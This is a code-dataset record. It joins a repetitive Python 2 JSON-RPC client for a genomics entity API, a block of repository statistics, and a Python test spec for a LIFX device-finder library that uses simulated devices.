body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsShownOn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsShownOn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_StrainParentOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_StrainParentOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_DerivedFromStrain(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_DerivedFromStrain',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_StrainWithPlatforms(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_StrainWithPlatforms',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_PlatformForStrain(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_PlatformForStrain',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_StrainWithSample(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_StrainWithSample',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_SampleForStrain(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_SampleForStrain',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Submitted(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Submitted',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_WasSubmittedBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_WasSubmittedBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_SupersedesAlignment(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_SupersedesAlignment',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsSupersededByAlignment(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsSupersededByAlignment',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_SupersedesTree(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_SupersedesTree',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsSupersededByTree(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsSupersededByTree',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Treed(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Treed',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsTreeFrom(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsTreeFrom',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_UsedIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_UsedIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasMedia(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasMedia',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Uses(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Uses',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsUsedBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsUsedBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_UsesCodons(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_UsesCodons',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_AreCodonsFor(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_AreCodonsFor',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
| 40.481647
| 104
| 0.490764
| 95,866
| 898,814
| 4.507542
| 0.00725
| 0.026222
| 0.055313
| 0.024745
| 0.958854
| 0.958127
| 0.957095
| 0.955617
| 0.955147
| 0.952333
| 0
| 0.009484
| 0.403329
| 898,814
| 22,202
| 105
| 40.48347
| 0.796266
| 0.062383
| 0
| 0.895534
| 1
| 0
| 0.129543
| 0.030363
| 0
| 0
| 0
| 0
| 0.000526
| 0
| null | null | 0.001105
| 0.000684
| null | null | 0.000105
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
5f2db84bcfe053322ca4507b2b70fecde345791c
| 21,922
|
py
|
Python
|
modules/tests/photons_control_tests/device_finder/test_special_reference.py
|
Djelibeybi/photons
|
bc0aa91771d8e88fd3c691fb58f18cb876f292ec
|
[
"MIT"
] | 51
|
2020-07-03T08:34:48.000Z
|
2022-03-16T10:56:08.000Z
|
modules/tests/photons_control_tests/device_finder/test_special_reference.py
|
delfick/photons
|
bc0aa91771d8e88fd3c691fb58f18cb876f292ec
|
[
"MIT"
] | 81
|
2020-07-03T08:13:59.000Z
|
2022-03-31T23:02:54.000Z
|
modules/tests/photons_control_tests/device_finder/test_special_reference.py
|
Djelibeybi/photons
|
bc0aa91771d8e88fd3c691fb58f18cb876f292ec
|
[
"MIT"
] | 8
|
2020-07-24T23:48:20.000Z
|
2021-05-24T17:20:16.000Z
|
# coding: spec
from photons_control.device_finder import DeviceFinder, Filter, Finder
from photons_app.special import SpecialReference
from photons_app import helpers as hp
from photons_messages import DeviceMessages, LightMessages, DiscoveryMessages
from photons_products import Products
from unittest import mock
import binascii
import pytest
@pytest.fixture(autouse=True)
def set_async_timeout(request):
request.applymarker(pytest.mark.async_timeout(10))
describe "DeviceFinder":
it "takes in filter":
fltr = Filter.empty()
reference = DeviceFinder(fltr)
assert reference.fltr is fltr
assert reference.finder is None
assert isinstance(reference, SpecialReference)
it "can take in a finder":
fltr = Filter.empty()
finder = mock.Mock(name="finder")
reference = DeviceFinder(fltr, finder=finder)
assert reference.fltr is fltr
assert reference.finder is finder
assert isinstance(reference, SpecialReference)
describe "usage":
@pytest.fixture()
def V(self):
class V:
fltr = mock.NonCallableMock(name="fltr", spec=[])
sender = mock.NonCallableMock(name="sender", spec=[])
@hp.memoized_property
def finder(s):
finder = mock.Mock(name="finder", spec=["finish"])
finder.finish = pytest.helpers.AsyncMock(name="finish")
return finder
return V()
describe "a_finder context manager":
async it "uses the finder on the reference if it exists", V:
reference = DeviceFinder(V.fltr, finder=V.finder)
async with reference.a_finder(V.sender) as f:
assert f is V.finder
V.finder.finish.assert_not_called()
V.finder.finish.assert_not_called()
async it "creates it's own finder if one isn't on the reference", V:
FakeFinder = mock.Mock(name="Finder", return_value=V.finder, spec=[])
reference = DeviceFinder(V.fltr)
with mock.patch("photons_control.device_finder.Finder", FakeFinder):
async with reference.a_finder(V.sender) as f:
assert reference.finder is None
assert f is V.finder
V.finder.finish.assert_not_called()
V.finder.finish.assert_called_once_with(None, None, None)
FakeFinder.assert_called_once_with(V.sender)
describe "info":
async it "yields devices from the finder", V:
called = []
class a_finder:
def __init__(s, sender):
called.append("got_sender")
assert sender is V.sender
async def __aenter__(s):
called.append("making_finder")
return V.finder
async def __aexit__(s, exc_typ, exc, tb):
pass
reference = DeviceFinder(V.fltr)
d1 = mock.Mock(name="d1")
d2 = mock.Mock(name="d2")
async def info(f):
called.append("info_start")
assert f is V.fltr
called.append("send_d1")
yield d1
called.append("send_d2")
yield d2
called.append("info_done")
V.finder.info = pytest.helpers.MagicAsyncMock(name="info", side_effect=info)
found = []
with mock.patch.object(reference, "a_finder", a_finder):
async for device in reference.info(V.sender):
called.append(("got_device", device))
found.append(device)
assert called == [
"got_sender",
"making_finder",
"info_start",
"send_d1",
("got_device", d1),
"send_d2",
("got_device", d2),
"info_done",
]
assert found == [d1, d2]
describe "serials":
async it "yields devices from the finder", V:
called = []
class a_finder:
def __init__(s, sender):
called.append("got_sender")
assert sender is V.sender
async def __aenter__(s):
called.append("making_finder")
return V.finder
async def __aexit__(s, exc_typ, exc, tb):
pass
reference = DeviceFinder(V.fltr)
d1 = mock.Mock(name="d1")
d2 = mock.Mock(name="d2")
async def find(f):
called.append("find_start")
assert f is V.fltr
called.append("send_d1")
yield d1
called.append("send_d2")
yield d2
called.append("find_done")
V.finder.find = pytest.helpers.MagicAsyncMock(name="find", side_effect=find)
found = []
with mock.patch.object(reference, "a_finder", a_finder):
async for device in reference.serials(V.sender):
called.append(("got_device", device))
found.append(device)
assert called == [
"got_sender",
"making_finder",
"find_start",
"send_d1",
("got_device", d1),
"send_d2",
("got_device", d2),
"find_done",
]
assert found == [d1, d2]
describe "Proxying Filter classmethods":
@pytest.fixture()
def fltr(self):
return Filter.from_kwargs(label="kitchen", cap=["matrix", "chain"])
it "supports from_json_str", V, fltr:
reference = DeviceFinder.from_json_str(
'{"label": "kitchen", "cap": ["matrix", "chain"]}'
)
assert reference.fltr == fltr
assert reference.finder is None
reference = DeviceFinder.from_json_str(
'{"label": "kitchen", "cap": ["matrix", "chain"]}', finder=V.finder
)
assert reference.fltr == fltr
assert reference.finder is V.finder
it "supports from_key_value_str", V, fltr:
reference = DeviceFinder.from_key_value_str("label=kitchen cap=matrix,chain")
assert reference.fltr == fltr
assert reference.finder is None
reference = DeviceFinder.from_key_value_str(
"label=kitchen cap=matrix,chain", finder=V.finder
)
assert reference.fltr == fltr
assert reference.finder is V.finder
it "supports from_url_str", V, fltr:
reference = DeviceFinder.from_url_str("label=kitchen&cap=matrix&cap=chain")
assert reference.fltr == fltr
assert reference.finder is None
reference = DeviceFinder.from_url_str(
"label=kitchen&cap=matrix&cap=chain", finder=V.finder
)
assert reference.fltr == fltr
assert reference.finder is V.finder
it "supports from_kwargs", V, fltr:
reference = DeviceFinder.from_kwargs(label="kitchen", cap=["matrix", "chain"])
assert reference.fltr == fltr
assert reference.finder is None
reference = DeviceFinder.from_kwargs(
label="kitchen", cap=["matrix", "chain"], finder=V.finder
)
assert reference.fltr == fltr
assert reference.finder is V.finder
it "supports empty", V, fltr:
for ri, rd in ((False, False), (True, True), (True, False), (False, True)):
expected = Filter.empty(refresh_info=ri, refresh_discovery=rd)
reference = DeviceFinder.empty(refresh_info=ri, refresh_discovery=rd)
assert reference.fltr == expected
assert reference.finder is None
reference = DeviceFinder.empty(
refresh_info=ri, refresh_discovery=rd, finder=V.finder
)
assert reference.fltr == expected
assert reference.finder is V.finder
reference = DeviceFinder.empty()
assert reference.fltr == Filter.empty(refresh_info=False, refresh_discovery=False)
assert reference.finder is None
reference = DeviceFinder.empty(finder=V.finder)
assert reference.fltr == Filter.empty(refresh_info=False, refresh_discovery=False)
assert reference.finder is V.finder
it "supports from_options", V, fltr:
reference = DeviceFinder.from_options(
{"label": "kitchen", "cap": ["matrix", "chain"]}
)
assert reference.fltr == fltr
assert reference.finder is None
reference = DeviceFinder.from_options(
{"label": "kitchen", "cap": ["matrix", "chain"]}, finder=V.finder
)
assert reference.fltr == fltr
assert reference.finder is V.finder
describe "finding devices":
@pytest.fixture()
async def V(self, final_future):
class V:
serials = ["d073d5000001", "d073d5000002", "d073d5000003"]
devices = pytest.helpers.mimic()
d1 = devices.add("d1")(serials[0], Products.LCM3_TILE, hp.Firmware(3, 50))
d2 = devices.add("d2")(
serials[1], Products.LCM2_Z, hp.Firmware(2, 80), value_store=dict(zones=[])
)
d3 = devices.add("d3")(
serials[2],
Products.LCM2_A19,
hp.Firmware(2, 80),
value_store=dict(
firmware=hp.Firmware(2, 80),
group={"identity": "aa", "label": "g1", "updated_at": 42},
location={"identity": "bb", "label": "l1", "updated_at": 56},
),
)
v = V()
async with V.devices.for_test(final_future) as sender:
v.sender = sender
yield v
async it "can get serials and info", V:
reference = DeviceFinder.empty()
found, ss = await reference.find(V.sender, timeout=5)
reference.raise_on_missing(found)
assert sorted(list(found)) == sorted(binascii.unhexlify(s)[:6] for s in ss)
assert ss == sorted(V.serials)
for device in V.devices:
V.devices.store(device).assertIncoming(DiscoveryMessages.GetService())
V.devices.store(device).clear()
reference = DeviceFinder.from_kwargs(label="kitchen")
found, ss = await reference.find(V.sender, timeout=5)
reference.raise_on_missing(found)
assert sorted(list(found)) == sorted(binascii.unhexlify(s)[:6] for s in ss)
assert ss == []
for device in V.devices:
V.devices.store(device).assertIncoming(
DiscoveryMessages.GetService(), LightMessages.GetColor()
)
V.devices.store(device).clear()
await V.d3.change_one("label", "kitchen", event=None)
reference = DeviceFinder.from_kwargs(label="kitchen")
found, ss = await reference.find(V.sender, timeout=5)
reference.raise_on_missing(found)
assert sorted(list(found)) == sorted(binascii.unhexlify(s)[:6] for s in ss)
assert ss == [V.d3.serial]
for device in V.devices:
V.devices.store(device).assertIncoming(
DiscoveryMessages.GetService(), LightMessages.GetColor()
)
V.devices.store(device).clear()
reference = DeviceFinder.from_kwargs(cap="matrix")
found, ss = await reference.find(V.sender, timeout=5)
reference.raise_on_missing(found)
assert sorted(list(found)) == sorted(binascii.unhexlify(s)[:6] for s in ss)
assert ss == [V.d1.serial]
for device in V.devices:
V.devices.store(device).assertIncoming(
DiscoveryMessages.GetService(), DeviceMessages.GetVersion()
)
V.devices.store(device).clear()
reference = DeviceFinder.from_kwargs(cap=["matrix", "multizone"])
found, ss = await reference.find(V.sender, timeout=5)
reference.raise_on_missing(found)
assert sorted(list(found)) == sorted(binascii.unhexlify(s)[:6] for s in ss)
assert ss == [V.d1.serial, V.d2.serial]
for device in V.devices:
V.devices.store(device).assertIncoming(
DiscoveryMessages.GetService(), DeviceMessages.GetVersion()
)
V.devices.store(device).clear()
reference = DeviceFinder.from_kwargs(cap=["not_matrix"], label="kitchen")
found, ss = await reference.find(V.sender, timeout=5)
reference.raise_on_missing(found)
assert sorted(list(found)) == sorted(binascii.unhexlify(s)[:6] for s in ss)
assert ss == [V.d3.serial]
for device in V.devices:
V.devices.store(device).assertIncoming(
DiscoveryMessages.GetService(),
LightMessages.GetColor(),
DeviceMessages.GetVersion(),
)
